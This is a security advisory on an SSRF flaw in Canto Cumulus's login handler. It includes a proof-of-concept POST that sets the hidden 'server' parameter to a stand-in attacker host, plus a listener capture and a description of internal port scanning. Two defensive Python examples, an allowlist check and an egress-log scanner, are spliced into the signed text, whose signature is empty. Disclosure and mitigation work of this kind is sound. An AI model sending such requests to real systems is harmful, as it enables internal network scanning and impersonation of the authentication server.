-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2022-023
Product:                   Canto Cumulus
Manufacturer:              Canto Inc.
Affected Version(s):       Through 11.1.3
Tested Version(s):         11.1.3 (Build 26f5823e)
Vulnerability Type:        Server-Side Request Forgery (CWE-918)
Risk Level:                High
Solution Status:           Mitigation possible
Manufacturer Notification: 2022-03-25
Solution Date:             No solution
Public Disclosure:         2022-06-01
CVE Reference:             Not yet assigned
Author of Advisory:        Thibaud Kehler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Canto Cumulus is a digital asset management (DAM) system.[1]

Due to missing validation of untrusted input, the Cumulus web server is
vulnerable to server-side request forgery (SSRF) over an unknown
proprietary protocol. This behavior poses a risk of denial-of-service
(DoS) attacks, impersonation attacks and attacks on the protocol itself,
with remote code execution (RCE) or authentication bypass as theoretical
outcomes.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

When logging in to the web server via the form at the URL
https://hostname.example/cwc/login, a hidden URL parameter 'server' is
sent to the server in the respective HTTP POST request to
https://hostname.example/cwc/catalog.

Afterwards, the web server establishes a TCP connection to the system
specified in that parameter, using an unknown protocol.

This yields the following problems:

 * Denial of service: The web server keeps the TCP connection open for
   around 60 seconds. This could be misused to fill limited resources
   on the server or the server's infrastructure, e.g. NAT tables or
   connection pools, resulting in a DoS.

 * Internal port scan: The web server responds differently depending on
   whether it was able to establish a connection to the specified TCP
   port. An attacker could use this behavior to conduct a port scan of
   the internal network.

 * Authentication bypass (theoretical): As the server is specified
   during authentication, the server-side request may be used to verify
   the credentials entered in the login form. An attacker could pose as
   the authentication server and forge a successful login or elevated
   privileges in the web application.

 * Protocol attacks (theoretical): The server-side request uses an
   unknown binary protocol. An attacker might launch further attacks on
   that protocol, e.g. buffer overflow or deserialization attacks. In
   the worst case, if the server's implementation of the protocol is
   vulnerable to such attacks, this results in RCE on the server.

SySS recommends restricting web server-side requests to a limited set
of trusted servers.
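The recommendation above, worked through as an added example that is not
part of this advisory and not Canto's code: a validation step that a web
server would run on the user-supplied 'server' value before opening any
TCP connection. Only targets on a fixed, server-side allowlist are
accepted, and every rejection produces the same generic error, because the
PoC section shows how differing responses turn an SSRF into an internal
port scan. The allowlist contents, the default port and all function names
are assumptions.

```python
"""Allowlist check for a user-supplied ``host:port`` target.

Added example, not from the SySS advisory or from Canto Cumulus.  The
allowlist, the default port and the names below are assumptions.
"""
from dataclasses import dataclass
from ipaddress import ip_address
from typing import Optional

# Assumed trusted catalog servers.  In practice this comes from the web
# server's own configuration, never from the HTTP request.
TRUSTED_SERVERS = {
    ("catalog1.internal.example", 8080),
    ("catalog2.internal.example", 8080),
}
DEFAULT_PORT = 8080  # assumed default when the client omits a port


class UntrustedServer(ValueError):
    """Raised for every rejected target: one generic message, no details."""


@dataclass(frozen=True)
class Target:
    host: str
    port: int


def parse_target(value: str) -> Target:
    """Split ``host``, ``host:port`` or ``[v6]:port`` into its parts.

    Anything that does not parse cleanly is rejected; attacker-controlled
    input is never 'repaired'.
    """
    value = value.strip()
    if not value or any(c.isspace() for c in value):
        raise UntrustedServer("server not allowed")
    if value.startswith("["):                 # bracketed IPv6 literal
        end = value.find("]")
        if end < 0:
            raise UntrustedServer("server not allowed")
        host, rest = value[1:end], value[end + 1:]
        if rest and not rest.startswith(":"):
            raise UntrustedServer("server not allowed")
        port_text = rest[1:]
    elif value.count(":") == 1:
        host, port_text = value.split(":")
    elif ":" in value:                        # bare IPv6 or malformed input
        raise UntrustedServer("server not allowed")
    else:
        host, port_text = value, ""
    if not port_text:
        port = DEFAULT_PORT
    elif port_text.isdigit() and 1 <= int(port_text) <= 65535:
        port = int(port_text)
    else:
        raise UntrustedServer("server not allowed")
    return Target(host, port)


def normalize_host(host: str) -> str:
    """Canonicalise IP literals and lowercase / un-dot hostnames so the
    allowlist comparison is exact ('::1' vs '0:0:0:0:0:0:0:1', trailing dot)."""
    try:
        return str(ip_address(host))
    except ValueError:
        return host.rstrip(".").lower()


def select_server(value: Optional[str]) -> Target:
    """Return the trusted target named by the request, or raise.

    Every rejection carries the same message so the caller cannot leak
    which check failed (the 302-vs-500 difference in the PoC is exactly
    the signal an internal port scan relies on).
    """
    if value is None:
        raise UntrustedServer("server not allowed")
    target = parse_target(value)
    target = Target(normalize_host(target.host), target.port)
    if (target.host, target.port) not in TRUSTED_SERVERS:
        raise UntrustedServer("server not allowed")
    return target


def is_allowed(value: Optional[str]) -> bool:
    """Boolean wrapper for a form handler: True only for allowlisted targets."""
    try:
        select_server(value)
        return True
    except UntrustedServer:
        return False


if __name__ == "__main__":
    for candidate in ("catalog1.internal.example:8080", "server.attacker:80",
                      "127.0.0.1:22", "[::1]:8080", None):
        print(repr(candidate), "->", "allowed" if is_allowed(candidate) else "rejected")
```

The connection should then be opened to the allowlisted entry that was
matched, not to the raw request string, so that nothing the client sent
reaches the socket layer.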

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

An attacker can specify an arbitrary IP address / hostname and port, as
depicted in the following HTTP POST request:

    POST /cwc/catalog HTTP/1.1
    Host: hostname.example
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 123

    OWASP_CSRFTOKEN=V1UT-I5A9-QIYJ-HG0C-A1UZ-8Z06-VQ6I-Q6CM&user=guest&password=guest&encmpoding=UTF-8&server=server.attacker:80

While processing the request, the web server connects to the specified TCP
port on the specified host via an unknown proprietary protocol:

    # ncat -nlvp 80 | hexdump -C
    Ncat: Version 7.92 ( https://nmap.org/ncat )
    Ncat: Listening on :::80
    Ncat: Listening on 0.0.0.0:80
    Ncat: Connection from [WAN IP].
    Ncat: Connection from [WAN IP]:10402.
    00000000  00 00 00 28 72 65 63 6f  00 00 00 02 00 00 00 04  |...(reco........|
    00000010  63 4d 49 44 4c 6f 6e 67  73 69 52 51 00 00 00 04  |cMIDLongsiRQ....|
    00000020  53 65 72 23 4c 6f 6e 67  00 04 77 7b 00 00 00 18  |Ser#Long..w{....|
    00000030  72 65 63 6f 00 00 00 01  00 00 00 04 63 4d 49 44  |reco........cMID|
    00000040  4c 6f 6e 67 51 75 69 74                           |LongQuit|
    00000048

If the specified host responds in an unexpected way, the web server
closes the server-side connection and answers the initial HTTP request
with HTTP status code 302 and a redirection to an error page:

    HTTP/1.1 302
    Server: nginx
    Date: Wed, 23 Mar 2022 16:31:43 GMT
    Content-Type: text/json;charset=utf-8
    Content-Length: 0
    Connection: keep-alive
    Set-Cookie: JSESSIONID=02505EB227E875FFAC9CB283AF8F16CB; Path=/cwc; Secure; HttpOnly
    X-Frame-Options: SAMEORIGIN
    Strict-Transport-Security: max-age=16070400
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    Location: /cwc/error.jspx?errorID=CumulusError&errorTitle=Cumulus+error&errorTitle=Cumulus+error&errorMessage=An+error+occured.&disableButtonDashboard=true

If the DNS name cannot be resolved or the specified TCP port is
unreachable, the server responds with HTTP status code 500 and renders
the login form with an additional error message stating that the server
could not be reached.

This differing behavior is what enables the internal port scan.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer has not released a patch and will not address the
vulnerability.

The manufacturer recommends securing the Cumulus server by using a firewall.
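Since a firewall is the only mitigation on offer, its egress logs are also
where a defender would look for the behavior described in this advisory.
The following added example (not from SySS or Canto) reads iptables-style
kernel LOG lines for outbound TCP connection attempts from the web server
host and reports two things: connections to anything other than the
trusted catalog servers, and many distinct destination ports on a single
host, which is the internal port scan pattern. The log lines, addresses,
rule prefix and threshold are all constructed.

```python
"""Egress review for a Cumulus web server behind a firewall.

Added example, not from the SySS advisory or from Canto.  Every address,
log line and threshold below is constructed for illustration.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Assumed: the only legitimate outbound targets of the web server are the
# Cumulus catalog servers, as (address, port).
TRUSTED_CATALOGS: Set[Tuple[str, int]] = {("10.0.7.3", 8080)}
WEB_SERVER_IP = "10.0.5.20"           # constructed address of the web server
SCAN_THRESHOLD = 5                    # distinct ports on one host -> suspicious

# Constructed iptables LOG output (the kernel writes KEY=VALUE tokens).
SAMPLE_LOG = """\
Jun  1 10:00:01 cumulus kernel: EGRESS: IN= OUT=eth0 SRC=10.0.5.20 DST=10.0.7.3 LEN=60 PROTO=TCP SPT=40112 DPT=8080 SYN URGP=0
Jun  1 10:00:05 cumulus kernel: EGRESS: IN= OUT=eth0 SRC=10.0.5.20 DST=203.0.113.7 LEN=60 PROTO=TCP SPT=10402 DPT=80 SYN URGP=0
Jun  1 10:00:09 cumulus kernel: EGRESS: IN= OUT=eth0 SRC=10.0.5.20 DST=10.0.9.14 LEN=60 PROTO=TCP SPT=10410 DPT=22 SYN URGP=0
Jun  1 10:00:10 cumulus kernel: EGRESS: IN= OUT=eth0 SRC=10.0.5.20 DST=10.0.9.14 LEN=60 PROTO=TCP SPT=10411 DPT=80 SYN URGP=0
Jun  1 10:00:11 cumulus kernel: EGRESS: IN= OUT=eth0 SRC=10.0.5.20 DST=10.0.9.14 LEN=60 PROTO=TCP SPT=10412 DPT=443 SYN URGP=0
Jun  1 10:00:12 cumulus kernel: EGRESS: IN= OUT=eth0 SRC=10.0.5.20 DST=10.0.9.14 LEN=60 PROTO=TCP SPT=10413 DPT=445 SYN URGP=0
Jun  1 10:00:13 cumulus kernel: EGRESS: IN= OUT=eth0 SRC=10.0.5.20 DST=10.0.9.14 LEN=60 PROTO=TCP SPT=10414 DPT=3389 SYN URGP=0
Jun  1 10:00:20 cumulus kernel: EGRESS: IN= OUT=eth0 SRC=10.0.5.20 DST=10.0.7.3 LEN=52 PROTO=UDP SPT=5353 DPT=53 LEN=32
Jun  1 10:00:21 cumulus kernel: EGRESS: IN= OUT=eth0 SRC=10.0.5.21 DST=203.0.113.9 LEN=60 PROTO=TCP SPT=5555 DPT=80 SYN URGP=0
"""

# KEY=VALUE tokens; bare flags such as SYN carry no '=' and are checked separately.
TOKEN = re.compile(r"\b([A-Z]+)=(\S*)")
SYN_FLAG = re.compile(r"\bSYN\b")


def outbound_syns(log: str) -> List[Tuple[str, str, int]]:
    """(src, dst, dport) for every new TCP connection from the web server."""
    result = []
    for line in log.splitlines():
        fields = dict(TOKEN.findall(line))
        if fields.get("PROTO") != "TCP" or not SYN_FLAG.search(line):
            continue                      # only connection attempts matter
        if fields.get("SRC") != WEB_SERVER_IP:
            continue                      # other hosts are out of scope here
        result.append((fields["SRC"], fields["DST"], int(fields["DPT"])))
    return result


def untrusted_destinations(log: str) -> List[Tuple[str, int]]:
    """Every (dst, dport) the web server tried that is not a trusted catalog.

    With the firewall the manufacturer recommends, these are blocked SYNs;
    each one is an SSRF attempt or a misconfiguration worth a look."""
    return [(dst, dport) for _, dst, dport in outbound_syns(log)
            if (dst, dport) not in TRUSTED_CATALOGS]


def port_scan_suspects(log: str, threshold: int = SCAN_THRESHOLD) -> Dict[str, int]:
    """Destination hosts that received at least ``threshold`` distinct ports,
    the signature of the internal port scan the advisory describes."""
    ports: Dict[str, Set[int]] = defaultdict(set)
    for _, dst, dport in outbound_syns(log):
        ports[dst].add(dport)
    return {dst: len(p) for dst, p in ports.items() if len(p) >= threshold}


if __name__ == "__main__":
    for dst, dport in untrusted_destinations(SAMPLE_LOG):
        print(f"untrusted egress: {WEB_SERVER_IP} -> {dst}:{dport}")
    for dst, count in port_scan_suspects(SAMPLE_LOG).items():
        print(f"possible port scan: {dst} ({count} distinct ports)")
```

On a real deployment the same logic runs over the firewall's actual log
source; the prefix, field names and addresses above must be adjusted to
match it, and the trusted set must mirror the firewall's egress allow rules.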

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-03-18: Vulnerability discovered
2022-03-25: Vulnerability reported to the manufacturer
2022-05-11: Manufacturer informed SySS that it will not address the vulnerability
2022-06-01: Public disclosure of the vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Canto Cumulus
    https://www.canto.com/de/cumulus/
[2] SySS Security Advisory SYSS-2022-023 (not yet published)
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-023.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Thibaud Kehler of SySS GmbH.

E-Mail: [email protected]
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thibaud_Kehler.asc
Key ID: 0xB645 7D7A
Key Fingerprint: CF29 54F1 1B7F 2FF5 7ED9 9BAD E9C7 9866 B645 7D7A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----